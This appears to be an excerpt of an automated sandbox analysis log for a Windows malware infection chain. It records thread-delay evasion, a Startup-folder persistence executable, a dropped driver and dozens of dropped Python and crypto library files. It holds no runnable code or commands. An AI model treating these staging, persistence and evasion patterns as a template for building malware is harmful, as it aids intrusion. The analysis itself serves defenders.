                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597310
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597196
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597078
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 596967
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 596858
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 596745
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 596636
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 596500
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 596078
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 595875
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 595731
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 595607
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 595468
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 595299
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 595156
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 595030
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594920
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594812
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594702
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594593
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594484
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594375
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594265
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594156
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 594047
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 593936
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 593778
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 593625
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 593323
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 593202
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 593094
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Window / User API: threadDelayed 4008
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Window / User API: threadDelayed 5719
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Window / User API: threadDelayed 5081
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Window / User API: threadDelayed 4734
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5597
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4178
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Window / User API: threadDelayed 3538
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Window / User API: threadDelayed 4893
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyexpat.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingft.cp311-win_amd64.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_keccak.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_clmul.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\python311.dll
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-32.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD2.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_chacha20.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA224.pyd
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_setup64.tmp
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ocb.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-32.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD4.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed25519.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pywintypes311.dll
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_strxor.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libssl-1_1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA224.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-arm64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\_speedups.cp311-win_amd64.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA512.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\select.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_ARC4.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-arm64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_poly1305.pyd
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-4SN19.tmp
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_ARC4.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA512.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_portable.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed448.pyd
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\9rpcss_1.drv (copy)
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_blowfish.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmath.cp311-win_amd64.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2s.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aesni.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cbc.pyd
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe Dropped PE file which has not been started: C:\Windows\Temp\aodefromlpug.sys
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_chacha20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_keccak.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pythoncom311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA1.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psutil_windows.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_poly1305.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmorph.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed448.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_cpuid_c.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_modexp.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-VSE52.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_isdecmp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_x25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA1.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_x25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\python3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_modexp.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA384.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA384.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_isdecmp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_cpuid_c.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_strxor.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libffi-8.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776Thread sleep time: -34017s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 824Thread sleep count: 68 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 824Thread sleep time: -136068s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3264Thread sleep count: 71 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3264Thread sleep time: -142071s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288Thread sleep count: 156 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288Thread sleep time: -4680000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep count: 59 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep time: -118059s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856Thread sleep count: 70 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856Thread sleep time: -140070s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 180Thread sleep count: 68 > 30Jump to behavior
